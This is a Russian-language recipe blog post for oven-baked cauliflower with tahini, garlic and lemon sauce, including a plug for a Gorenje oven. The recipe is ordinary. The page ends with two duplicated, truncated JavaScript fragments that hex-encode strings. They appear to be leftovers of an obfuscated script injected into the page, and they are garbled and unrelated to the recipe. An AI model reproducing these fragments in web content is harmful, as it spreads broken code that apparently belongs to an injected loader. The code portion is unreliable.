Печеная цветная капуста с соусом из тахины
С детства я любила жареную цветную капусту в кляре. С румяной корочкой, политая сметанкой, казалось-ничего вкуснее и быть не может! Но сколько жира,это кошмар и ужас конечно…
Я пробовала искать альтернативы. Не обжаривала отваренную капусту, делала соус из йогурта, было вкусно, но как-то пресновато. Достойная замена а наконец то нашлась благодаря Джейми Оливеру, я запекла капусту на противне и была просто покорена богатым вкусом и шикарной текстурой! И действий гораздо меньше чем при жарке-закинул на противень в духовку сырую капусту-и все. Ничего варить, потом жарить не нужно. Дело осталось за малым, за соусом. Его я решила сделать ближневосточным, таким,как для фалафелей, из кунжутной пасты тахины. Она кроме того что невозможно вкусная, еще и невозможно полезная, кальций, витамин Е, все при ней. А чеснок и лимонный сок добавляют вкусу яркости и остроты. Без преувеличения скажу-блюдо роскошное, можно есть и есть, остановиться сложно!
И без встроенной духовки Gorenje BO 53 CLI я б не справилась!
Ингредиенты:
1.Капуста цветная 1 кг.
2.Лимон 1 шт.
3.Чеснок 1 головка
5.Петрушка 1 пучок
6.Тахина 3 ст.л.
7.Масло оливковое 3 ст.л.
8.Зира 1 ч.л.
9.Соль
10.Перец черный
Готовим!
1.Капусту вымыть и разделить на небольшие соцветия. Выложить капусту на противень, выдавить на нее половину чеснока, посыпать зирой, солью, перцем, полить оливковым маслом и перемешать. Запекать при температуре 180 градусов около 40 минут, пару раз перемешав. Капуста должна стать румяной и легко рокалываться ножом.
2.Для соуса положить тахину в миску и долить примерно 100 мл. теплой воды. Тщательно перемешать . Добавить сок лимона, раздавленный чеснок, соль и перец по вкусу. Горячую капусту посыпать рубленной петрушкой и полить соусом.
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o